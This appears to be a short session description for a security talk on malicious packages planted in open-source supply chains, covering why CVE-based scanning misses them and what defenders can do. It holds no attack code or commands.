Attackers know that most modern application code is composed primarily of open-source software with a relatively small amount of 1st-party code. Researchers, including our own are witnessing, in real-time, attackers planting packages with malicious code into open-source software supply chains. As a result, as application developers incorporate these affected libraries into their codebase , this malicious code becomes part of the applications you are publishing. Making matters even worse, these malicious packages are not tracked as CVEs on Mitre.org – organizations have no idea that they have just become a victim because the traditional methods for identifying risky open-source components are blind to these attacks. These security concerns are not inherent to the open-source software itself, but rather, how the malicious software propagates undetected throughout software supply chains.
Software developers and software security professionals will find this session useful if they would like to learn more about:
· Techniques attackers use to plant malicious code in the supply chain
· The differences between identifying the presence of CVEs in open-source components and outright malicious packages
· Steps to take now so you do not fall victim to these attacks
· How to focus mitigation and remediation efforts without disrupting development teams